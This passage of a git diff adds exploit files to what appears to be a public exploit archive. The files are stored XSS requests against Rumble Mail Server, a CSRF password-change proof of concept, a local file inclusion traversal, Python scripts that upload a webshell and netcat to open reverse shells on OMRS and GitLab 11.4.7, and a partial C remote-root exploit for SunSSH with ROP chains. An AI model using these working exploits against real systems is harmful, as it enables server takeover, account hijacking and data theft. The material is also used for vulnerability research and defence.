+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1:2580/settings
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+
+save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
+HTTP/1.1 302 Moved
+Location: /settings:save
+
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on <script>alert(xss.com)</script><br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h1>Server settings</h1>
+
+Saving config/rumble.conf
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49254.txt b/exploits/multiple/webapps/49254.txt
new file mode 100644
index 000000000..c94a10cea
--- /dev/null
+++ b/exploits/multiple/webapps/49254.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Info
+The parameters `domain` and `path` are vulnerable to stored XSS.
+
+# Exploit:
+POST /domains HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
+Upgrade-Insecure-Requests: 1
+
+domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h2>Domains</h2>
+<p>
+  <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
+			<div>
+			<div >
+				<div class='form_key'>
+					Domain name:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="domain"/>
+				</div>
+			</div>
+
+			<div>
+				<div class='form_key'>
+					Optional alt. storage path:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="path"/>
+				</div>
+			</div>
+
+
+			<div class='form_el' id='domainsave' >
+				<div class='form_key'>
+						<input type="hidden" name="create" value="true"/>
+					<input class="button" type="submit" value="Save domain"/>
+					<input class="button"  type="reset" value="Reset"/>
+				</div>
+			</div>
+			<br/><br/><br/><br/><br />
+			</div>
+			</form>
+			</td></tr></table></p>
+<p>&nbsp;</p>
+<table class="elements" border='0' cellpadding='5' cellspacing='1'>
+  <tr><th>Domain</th><th>Actions</th></tr>
+<tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49255.txt b/exploits/multiple/webapps/49255.txt
new file mode 100644
index 000000000..50b5847d1
--- /dev/null
+++ b/exploits/multiple/webapps/49255.txt
@@ -0,0 +1,146 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /users HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/users
+Upgrade-Insecure-Requests: 1
+
+username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a.com<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+
+
+<h1>RumbleLua users </h1>
+<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
+Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
+while regular users can only
+see and edit the domains they have access to.
+</p>
+<table class="elements">
+  <tr>
+    <th>Create a new user:</th>
+  </tr>
+<tr>
+<td>
+<form action="/users" method="post" name="makeuser">
+
+  <div style="width: 300px; text-align:right; float: left;">
+    <label for="username"><strong>Username:</strong></label>
+    <input name="username" autocomplete="off" type="text" id="username" >
+    <br>
+    <label for="password"><strong>Password:</strong></label>
+    <input type="password" autocomplete="off" name="password" id="password">
+    <br />
+    <label for="password"><strong>Access rights:</strong></label>
+    <select name="rights" size="4" style="width: 150px;" multiple="multiple">
+    <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
+    <optgroup label="Domains:">
+        </optgroup>
+    </select>
+      </div>
+    <p><br /><br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+
+      &nbsp;&nbsp;
+      <input type="submit" name="submit" id="submit" value="Submit" />
+    </p>
+
+</form>
+</td>
+</tr>
+</table>
+<table width="200" class="elements">
+  <tr>
+    <th>Username</th>
+    <th>Rights</th>
+    <th>Actions</th>
+  </tr>
+  <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+  </table>
+<p>&nbsp;</p>
+
+
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49245.txt b/exploits/php/webapps/49245.txt
new file mode 100644
index 000000000..b67419f9e
--- /dev/null
+++ b/exploits/php/webapps/49245.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change 
+password)
+# Date: 2020-12-14
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://www.rukovoditel.net/download.php
+# Version: v2.6.1
+# Tested on: Kali Linux
+
+POC(localhost/index.php?module=users/change_password):
+
+<html>
+   <!-- CSRF PoC  -->
+   <body>
+   <script>history.pushState('', '', '/')</script>
+     <form 
+action="https://localhost/index.php?module=users/change_password&action=change" 
+method="POST">
+       <input type="hidden" name="form&#95;session&#95;token" 
+value="D&#94;HUyTDh0X" />
+       <input type="hidden" name="password&#95;new" value="123456789" />
+       <input type="hidden" name="password&#95;confirmation" 
+value="123456789" />
+       <input type="submit" value="Submit request" />
+     </form>
+   </body>
+</html>
+
+
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/49258.txt b/exploits/php/webapps/49258.txt
new file mode 100644
index 000000000..e61a6f1c1
--- /dev/null
+++ b/exploits/php/webapps/49258.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
+# Exploit Author: İsmail BOZKURT
+# Date: 2020-12-15
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Windows 10 x86_64
+
+Step 1. Log into application with credentials
+Step 2. Click on Branch
+Step 3. Select New Branch http://127.0.0.1/index.php?page=index
+Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00
+
+Note: php version < 5.3.3
+
+section class="content">
+    <div class="container-fluid">
+    <?php 
+    	$page = isset($_GET['page']) ? $_GET['page'] : 'home';
+	    if(!file_exists($page.".php")){
+	    include '404.html';
+	    }else{
+	    include $page.'.php';
+    }
+    ?>
\ No newline at end of file
diff --git a/exploits/php/webapps/49260.py b/exploits/php/webapps/49260.py
new file mode 100755
index 000000000..1d2d8b55c
--- /dev/null
+++ b/exploits/php/webapps/49260.py
@@ -0,0 +1,128 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-14-12
+# Exploit Author: Andrea Bruschi - www.andreabruschi.net
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 / Xampp Server and Wamp Server
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import os
+import iterm2
+import AppKit
+
+url = sys.argv[1]
+mobile = sys.argv[2]
+password = sys.argv[3] 
+
+# CONFIGURE HERE
+reverse_ip = '192.168.xx.xx'
+reverse_port = 4444
+
+# CONFIGURE HERE
+# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
+netcat_path = '/local/path/to/nc.exe'
+shell_path = '/local/path/to/shell.php'
+
+
+def login(url, mobile, password):
+
+    url = "{}/user/login.php".format(url)
+    payload = {'mobno':mobile, 'password':password, 'login':''}
+    req = requests.post(url, data=payload)
+    cookie = req.cookies['PHPSESSID']
+    
+    return cookie
+
+
+def upload(url, cookie, file=None):
+
+    f = open(file, 'rb')
+    filename, ext = os.path.splitext(file)
+
+    if "exe" in ext:
+        content_type = 'application/octet-stream'
+    else:
+        content_type = 'application/x-php'
+
+    cookie = {'PHPSESSID':cookie}
+    url = "{}/user/marriage-reg-form.php".format(url)
+
+    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
+    req = requests.post(url, data=payload, cookies=cookie, files=files)
+    print(f'[+] File {ext} uploaded')
+
+
+def get_remote_file(url, ext):
+
+    url = "{}/user/images".format(url)
+    req = requests.get(url)
+    junk = req.text.split(ext)[0]
+    f = junk[-42:] + ext
+    
+    return f
+
+
+def persistence(url, webshell, netcat):
+
+    # webshell
+    payload_w = "copy /y {} shell.php".format(webshell)
+    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
+    req_w = requests.get(url_w)
+    
+    # netcat
+    payload_n = "copy /y {} nc.exe".format(netcat)
+    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
+    req_n= requests.get(url_n)
+
+    print('[+] Persistence enabled')
+
+
+def get_reverse(url, ip, port):
+
+    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
+    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
+    print('[+] Reverse shell incoming!')
+    req = requests.get(url_r)
+
+
+# CONFIGURE HERE
+# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
+# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
+def start_listener(port):
+    
+    # Launch the app
+    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
+
+    async def main(connection):
+        app = await iterm2.async_get_app(connection)
+        window = app.current_window
+        if window is not None:
+            cmd = "nc -lnv {}".format(port)
+            await window.async_create_tab(command=cmd)
+        else:
+            print("No current window")
+
+    iterm2.run_until_complete(main)
+
+
+
+if __name__ == "__main__":
+
+    if len(sys.argv < 3): 
+        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
+    else:
+        cookie = login(url, mobile, password)
+        upload(url, cookie, netcat_path)
+        upload(url, cookie, shell_path)
+        webshell = get_remote_file(url, '.php')
+        netcat = get_remote_file(url, '.exe')
+        persistence(url, webshell, netcat)
+        
+        start_listener(reverse_port)
+        get_reverse(url, reverse_ip, reverse_port)
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49257.py b/exploits/ruby/webapps/49257.py
new file mode 100755
index 000000000..e44dae0c7
--- /dev/null
+++ b/exploits/ruby/webapps/49257.py
@@ -0,0 +1,64 @@
+# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
+# Date: 14-12-2020
+# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
+# Vendor Homepage: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested On: Debian 10 + Apache/2.4.46 (Debian)
+# Version: 11.4.7 community
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+
+# Sign in GitLab 11.4.7  portal and get (using Burp or something other):
+# authenticity_token
+# authenticated cookies
+# username
+# specify localport and localip for reverse shell
+
+username='aaaaaaaaaaaa'
+authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
+cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
+localport='1234'
+localip='192.168.0.114'
+
+
+url = "http://192.168.0.130:5080"
+proxies = { "http": "http://localhost:8080" }
+
+
+def deb(str):
+    print("Debug => "+str)
+
+def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
+    return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
+
+import string
+def random_string(length):
+    return ''.join(random.choice(string.ascii_letters) for m in range(length))
+
+def init(username,cookie,authenticity_token,localport,localip):
+    from bs4 import BeautifulSoup
+    import re
+    import urllib.parse
+    deb("Token: "+authenticity_token)
+    deb("Cookie: "+cookie)
+    session=requests.Session()
+    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
+    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
+    soup = BeautifulSoup(r.content,"lxml")
+    nsid = soup.findAll('input', {"id": "project_namespace_id"})
+    namespace_id=nsid[0]['value'];
+    deb("Namespace ID: "+namespace_id)
+    prgname=random_string(8)
+    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
+    newpayload=urllib.parse.urlencode(newpayload)
+    deb("Payload encoded: "+newpayload)
+    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
+    os.system("nc -nvlp "+localport)
+
+init(username,cookie,authenticity_token,localport,localip)
\ No newline at end of file
diff --git a/exploits/solaris/remote/49261.c b/exploits/solaris/remote/49261.c
new file mode 100644
index 000000000..404c67bbe
--- /dev/null
+++ b/exploits/solaris/remote/49261.c
@@ -0,0 +1,592 @@
+# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root 
+# Exploit Author: Hacker Fantastic
+# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
+# Version: 11
+# Tested on: SunOS solaris 5.11 11.0
+
+/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
+ * ====================================================================
+ * Makefile
+ * all: hfsunsshdx
+ *
+ *	hfsunsshdx: main.c
+ *	gcc main.c -o hfsunsshdx -lssh2 
+ *
+ *	clean:
+ *	rm -rf hfsunsshdx
+ *	rm -rf core.*
+ *
+ * A trivial to reach stack-based buffer overflow is present in libpam on
+ * Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
+ * which allocates a fixed size buffer of 512 bytes on the stack and parses
+ * usernames into the buffer via modules (authtok_get) without bounds checks.
+ * This issue can be reached remotely pre-authentication via SunSSH when
+ * "keyboard-interactive" is enabled to use PAM based authentication. The
+ * vulnerability was discovered being actively exploited by FireEye in the
+ * wild and is part of an APT toolkit called "EVILSUN". The vulnerability
+ * is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
+ * This exploit uses ROP gadgets to disable nxstack through mprotect on x86
+ * and a helper shellcode stub. The configuration in a default Solaris 
+ * install is vulnerable. The exploit makes use of libssh2 and tested on
+ * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable 
+ * SunSSH implementation and versions later than 11.1 have updated SunSSH
+ * code that prevents the issue being triggered.
+ *
+ * e.g.
+ *  ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
+ *  [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
+ *  [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
+ *  [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
+ *  [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
+ *  [+] entering keyboard-interactive authentication.
+ *  [-] number of prompts: 1
+ *  [-] prompt 0 from server: 'Please enter user name: '
+ *  [-] shellcode length 193 bytes
+ *  [-] rop chain length 68
+ *  [-] exploit buffer length 580
+ *  [-] sending exploit magic buffer... wait
+ *  [+] exploit success, handling payload...
+ *  [-] connected.. enjoy :)
+ *  SunOS solaris 5.11 11.0 i86pc i386 i86pc
+ *   6:49pm  up 53 min(s),  1 user,  load average: 0.01, 0.01, 0.01
+ *  helpdesk   console      Nov 27 17:57
+ *  uid=0(root) gid=0(root)
+ *
+ * -- Hacker Fantastic (https://hacker.house)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <ctype.h>
+#include <getopt.h>
+#include <time.h>
+#include <signal.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <sys/select.h>
+#include <arpa/inet.h>
+#include <sys/time.h>
+#include <libssh2.h>
+
+int sd = -1;
+int oldsd = -1;
+int ishell = -1;
+char* buf;
+char* payload;
+char* retaddr;
+struct sockaddr_in sain;
+
+struct target {
+	char* name;
+	char* ropchain;
+};
+
+struct shellcode {
+	char* name;
+	char* shellcode;
+};
+
+void spawn_shell(int);
+void bindshell_setup(short);
+void on_alarm(int);
+void on_interupt(int);
+void prepare_payload();
+
+const int targetno = 5;
+struct target targets[] = {
+	{"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
+	"\x41\x42\x43\x44"  // %ebx
+	"\x45\x46\x47\x48"  // %esi 
+	"\x50\x51\x52\x53"  // %ebp
+	"\xa7\x0e\x06\x08"  // pop %ecx, pop %edx, pop %ebp
+	"\x9c\x3e\x04\x08"  // ptr to (0x?, 0x?, 0x8044cf0, 0x7) 
+	"\x01\x01\x04\x08"  // %edx unused, must be writeable addr
+	"\x41\x42\x43\x44"  // %ebp unused var 
+	"\x93\xdb\xc8\xfe"  // pop %edx ; ret
+	"\x01\x30\x04\x08"  // ptr to 0x08043001 mprotect arg
+	"\x1a\xe7\x0b\xfe"  // dec %edx ; ret 
+	"\x79\x41\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
+	"\x93\xdb\xc8\xfe"  // pop %edx ; ret 
+	"\x01\x30\x04\x08"  // ptr to shellcode
+	"\xe0\xe8\x3e\xfe"  // mov $0x72,%al 
+	"\x64\x7c\xc3\xfe"  // inc %eax ; ret
+        "\x64\x7c\xc3\xfe"  // inc %eax ; ret	
+	"\x22\x9d\xd3\xfe"},// sysenter
+	{"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
+	"\x41\x42\x43\x44"  // %ebx overwrite unused
+	"\x41\x42\x43\x44"  // %esi overwrite unused
+	"\xf8\x32\x04\x08"  // %ebp overwrite unused
+	"\xb7\xf9\x05\x08"  // pop %ecx ; pop %edx ; pop %ebp ; ret
+	"\x7e\x36\x02\x04"  // ptr/2 to (0x?, 0x0, 0x1000, 0x7) 
+	"\x01\x30\x04\x08"  // ptr for %edx
+	"\x44\x43\x42\x41"  // ptr for %ebp unused
+	"\xe4\xd4\xde\xfe"  // dec %edx ; add %ecx, %ecx ; ret
+	"\x19\x42\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
+	"\xb8\xf9\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xeb\x30\x04\x08"  // shellcode ptr for %edx
+	"\x1c\x33\x04\x08"  // %ebp & used by "leave"
+        "\x84\x98\x51\xfe"  // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
+        "\x41\x42\x43\x44"  // %esi unused
+        "\xe0\x30\x04\x08"  // shellcode ptr to %ebx                              
+        "\xe8\x32\x04\x08"  // ptr into %ebp        
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret  
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
+        "\x11\x3f\xfe\xfe"  // sub $0x2,%eax ; ret
+	"\xfe\xf8\xcf\xfe"},// sysenter
+	{"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
+	"\xc3\x31\x04\x08"  // overwrite %ebp unused
+	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
+	"\x29\x28\x07\x08"  // pop %ebx ; ret
+	"\xf0\xff\xaf\xfe"  // 0x0a writen to address, unused gadget
+	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\x01\x30\x04\x08"  // %edx pointer to page
+	"\xb8\x31\x04\x08"  // unused %ebp value
+	"\xaa\x4c\x68\xfe"  // pop %ecx ; ret
+	"\xe0\x6e\x04\x08"  // ptr (0x?,0x0,0x1000,0x7)
+	"\x61\x22\x07\x08"  // dec %edx ; ret
+	"\x8b\x2d\xfe\xfe"  // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
+	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
+	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xc3\x31\x04\x08"  // shellcode addr for %edx
+	"\xc3\x31\x04\x08"  // unused %ebp value
+	"\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
+	{"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
